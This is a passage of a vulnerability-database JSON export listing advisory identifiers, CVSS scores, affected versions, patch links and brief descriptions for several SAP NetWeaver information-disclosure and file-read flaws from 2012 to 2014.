Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "PACKETSTORM",
"id": "110028"
}
],
"trust": 4.68
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "52101",
"trust": 4.9
},
{
"db": "SECUNIA",
"id": "47861",
"trust": 4.7
},
{
"db": "NVD",
"id": "CVE-2012-1292",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2012-0825",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0822",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0826",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0827",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2012-0823",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "110028",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"id": "VAR-201202-0348",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
],
"trust": 2.67111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 2.4
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
}
]
},
"last_update_date": "2023-12-18T12:10:14.091000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability (CNVD-2012-0825)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10773"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0822)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10771"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0826)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10774"
},
{
"title": "Patch for SAP NetWeaver Information Disclosure Vulnerability (CNVD-2012-0827)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10775"
},
{
"title": "Patch for SAP NetWeaver File Read Vulnerability (CNVD-2012-0823)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/10772"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-1292"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://secunia.com/advisories/47861/"
},
{
"trust": 2.0,
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/47861"
},
{
"trust": 1.6,
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/52101"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1292"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1292"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://www.rsaconference.com/events/2012/usa/index.htm"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47861/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-21T00:00:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"date": "2012-02-21T06:09:48",
"db": "PACKETSTORM",
"id": "110028"
},
{
"date": "2012-02-23T20:07:25.987000",
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"date": "2012-02-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-27T20:40:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001572"
},
{
"date": "2012-02-27T05:00:00",
"db": "NVD",
"id": "CVE-2012-1292"
},
{
"date": "2012-02-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver In MessagingSystem Performance Data Vulnerability to get important information about",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001572"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-446"
}
],
"trust": 0.6
}
}
var-201303-0439
Vulnerability from variot
SAP NetWeaver is the next generation of service-based platform that will serve as the foundation for all future SAP applications. There is a file disclosure vulnerability in Classification (CA-CL) for SAP NetWeaver 7.30 and others. Because of the SMB Relay attack, an attacker can exploit this vulnerability to obtain arbitrary files on the SAP server file system. Remote attackers can exploit this issue to disclose arbitrary files in the context of the application. This may aid in further attacks. SAP NetWeaver 7.30 is vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201303-0439",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.3"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
}
],
"sources": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"db": "BID",
"id": "58612"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nikolay Mescherin (ERPScan)",
"sources": [
{
"db": "BID",
"id": "58612"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
],
"trust": 0.9
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-02049",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-02049",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the next generation of service-based platform that will serve as the foundation for all future SAP applications. There is a file disclosure vulnerability in Classification (CA-CL) for SAP NetWeaver 7.30 and others. Because of the SMB Relay attack, an attacker can exploit this vulnerability to obtain arbitrary files on the SAP server file system. \nRemote attackers can exploit this issue to disclose arbitrary files in the context of the application. This may aid in further attacks. \nSAP NetWeaver 7.30 is vulnerable; other versions may also be affected",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"db": "BID",
"id": "58612"
},
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "58612",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-02049",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526",
"trust": 0.6
},
{
"db": "IVD",
"id": "A0983BB4-1F2F-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"db": "BID",
"id": "58612"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
]
},
"id": "VAR-201303-0439",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
}
]
},
"last_update_date": "2022-05-17T01:55:57.931000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver CA-CL SMB Relay Patch for Any File Disclosure Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32984"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02049"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.securelist.com/en/advisories/52699"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58612"
},
{
"trust": 0.3,
"url": "http://erpscan.com/advisories/dsecrg-13-007-sap-netweaver-classification-smb-relay-vulnerability/"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://websmp230.sap-ag.de/sap/support/notes/1807196"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"db": "BID",
"id": "58612"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"db": "BID",
"id": "58612"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-03-25T00:00:00",
"db": "IVD",
"id": "a0983bb4-1f2f-11e6-abef-000c29c66e3d"
},
{
"date": "2013-03-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"date": "2013-03-12T00:00:00",
"db": "BID",
"id": "58612"
},
{
"date": "2013-03-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-05-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-02049"
},
{
"date": "2013-03-12T00:00:00",
"db": "BID",
"id": "58612"
},
{
"date": "2013-03-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver CA-CL SMB Relay Arbitrary File Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "58612"
},
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201303-526"
}
],
"trust": 0.6
}
}
var-201405-0533
Vulnerability from variot
SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors. SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. SAP NetWeaver 7.20 and prior are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201405-0533",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "lte",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.03"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "6.4"
}
],
"sources": [
{
"db": "BID",
"id": "67448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002561"
},
{
"db": "NVD",
"id": "CVE-2014-3787"
},
{
"db": "CNNVD",
"id": "CNNVD-201405-322"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.20",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
